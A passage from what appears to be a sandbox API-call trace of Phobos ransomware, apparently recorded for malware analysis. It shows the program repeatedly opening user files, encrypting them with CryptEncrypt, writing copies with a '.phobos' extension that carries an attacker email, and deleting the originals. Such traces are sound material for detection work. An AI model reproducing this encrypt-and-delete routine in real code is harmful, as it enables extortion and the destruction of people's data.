lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf5a0, lpOverlapped=0x0) returned 1 [0197.751] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa329a8) returned 1 [0197.751] CryptSetKeyParam (hKey=0xa329a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.751] CryptEncrypt (in: hKey=0xa329a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0197.751] CryptDestroyKey (hKey=0xa329a8) returned 1 [0197.751] WriteFile (in: hFile=0x170, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0197.751] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0197.751] CloseHandle (hObject=0x140) returned 1 [0197.751] CloseHandle (hObject=0x170) returned 1 [0197.751] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uFUu.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ufuu.pptx")) returned 1 [0197.753] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0197.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VuFT cdP3R7y8CXFbez.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vuft cdp3r7y8cxfbez.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.754] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=71634) returned 1 [0197.754] CloseHandle (hObject=0x170) returned 1 [0197.754] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VuFT cdP3R7y8CXFbez.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vuft cdp3r7y8cxfbez.docx")) returned 0x20 [0197.754] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VuFT cdP3R7y8CXFbez.docx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vuft cdp3r7y8cxfbez.docx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VuFT cdP3R7y8CXFbez.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vuft cdp3r7y8cxfbez.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.754] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.754] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.755] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VuFT cdP3R7y8CXFbez.docx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vuft cdp3r7y8cxfbez.docx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0197.755] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ca8) returned 1 [0197.755] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.755] ReadFile (in: hFile=0x170, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x117d2, lpOverlapped=0x0) returned 1 [0197.757] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x117e0, dwBufLen=0x117e0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x117e0) returned 1 [0197.757] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x117e0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x117e0, lpOverlapped=0x0) returned 1 [0197.759] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa329a8) returned 1 [0197.759] CryptSetKeyParam (hKey=0xa329a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.759] CryptEncrypt (in: hKey=0xa329a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60, dwBufLen=0x60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60) returned 1 [0197.759] CryptDestroyKey (hKey=0xa329a8) returned 1 [0197.759] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x112, lpOverlapped=0x0) returned 1 [0197.759] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0197.760] CloseHandle (hObject=0x170) returned 1 [0197.760] CloseHandle (hObject=0x140) returned 1 [0197.760] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VuFT cdP3R7y8CXFbez.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vuft cdp3r7y8cxfbez.docx")) returned 1 [0197.761] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0197.761] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YMfOX888Olkz.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ymfox888olkz.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0197.762] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=17796) returned 1 [0197.762] CloseHandle (hObject=0x140) returned 1 [0197.762] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YMfOX888Olkz.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ymfox888olkz.pptx")) returned 0x20 [0197.763] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YMfOX888Olkz.pptx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ymfox888olkz.pptx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.763] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YMfOX888Olkz.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ymfox888olkz.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0197.763] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.763] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.763] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YMfOX888Olkz.pptx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ymfox888olkz.pptx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.764] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ca8) returned 1 [0197.764] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.764] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x4584, lpOverlapped=0x0) returned 1 [0197.774] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4590, dwBufLen=0x4590 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4590) returned 1 [0197.774] WriteFile (in: hFile=0x170, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x4590, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x4590, lpOverlapped=0x0) returned 1 [0197.775] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa328a8) returned 1 [0197.775] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.775] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0197.775] CryptDestroyKey (hKey=0xa328a8) returned 1 [0197.776] WriteFile (in: hFile=0x170, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0197.776] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0197.776] CloseHandle (hObject=0x140) returned 1 [0197.776] CloseHandle (hObject=0x170) returned 1 [0197.776] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YMfOX888Olkz.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ymfox888olkz.pptx")) returned 1 [0197.777] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0197.777] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.782] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=282) returned 1 [0197.782] CloseHandle (hObject=0x170) returned 1 [0197.782] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini")) returned 0x26 [0197.782] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.783] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.783] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.798] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.798] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0197.799] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ca8) returned 1 [0197.799] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.799] ReadFile (in: hFile=0x170, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x11a, lpOverlapped=0x0) returned 1 [0197.800] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120, dwBufLen=0x120 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120) returned 1 [0197.800] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x120, lpOverlapped=0x0) returned 1 [0197.801] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa328a8) returned 1 [0197.801] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.801] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0197.801] CryptDestroyKey (hKey=0xa328a8) returned 1 [0197.801] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0197.801] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0197.801] CloseHandle (hObject=0x170) returned 1 [0197.801] CloseHandle (hObject=0x140) returned 1 [0197.801] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini")) returned 1 [0197.802] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0197.802] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0197.803] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=402) returned 1 [0197.803] CloseHandle (hObject=0x140) returned 1 [0197.803] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini")) returned 0x26 [0197.803] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.803] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0197.803] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.803] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.803] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.804] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ca8) returned 1 [0197.804] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.804] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x192, lpOverlapped=0x0) returned 1 [0197.804] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1a0, dwBufLen=0x1a0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1a0) returned 1 [0197.804] WriteFile (in: hFile=0x170, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1a0, lpOverlapped=0x0) returned 1 [0197.805] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa328a8) returned 1 [0197.805] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.805] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0197.805] CryptDestroyKey (hKey=0xa328a8) returned 1 [0197.805] WriteFile (in: hFile=0x170, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0197.805] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0197.805] CloseHandle (hObject=0x140) returned 1 [0197.805] CloseHandle (hObject=0x170) returned 1 [0197.805] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini")) returned 1 [0197.806] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0197.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.807] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=80) returned 1 [0197.807] CloseHandle (hObject=0x170) returned 1 [0197.807] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini")) returned 0x6 [0197.807] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.807] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.807] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.807] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.807] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0197.935] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32828) returned 1 [0197.935] CryptSetKeyParam (hKey=0xa32828, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.935] ReadFile (in: hFile=0x170, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x50, lpOverlapped=0x0) returned 1 [0197.936] CryptEncrypt (in: hKey=0xa32828, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60, dwBufLen=0x60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60) returned 1 [0197.936] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x60, lpOverlapped=0x0) returned 1 [0197.937] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32868) returned 1 [0197.937] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.937] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0197.937] CryptDestroyKey (hKey=0xa32868) returned 1 [0197.937] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0197.937] CryptDestroyKey (hKey=0xa32828) returned 1 [0197.937] CloseHandle (hObject=0x170) returned 1 [0197.937] CloseHandle (hObject=0x180) returned 1 [0197.937] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini")) returned 1 [0197.938] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0197.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\3UWU5dw.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\3uwu5dw.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0197.988] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=78696) returned 1 [0197.988] CloseHandle (hObject=0x160) returned 1 [0197.988] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\3UWU5dw.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\3uwu5dw.m4a")) returned 0x20 [0197.988] 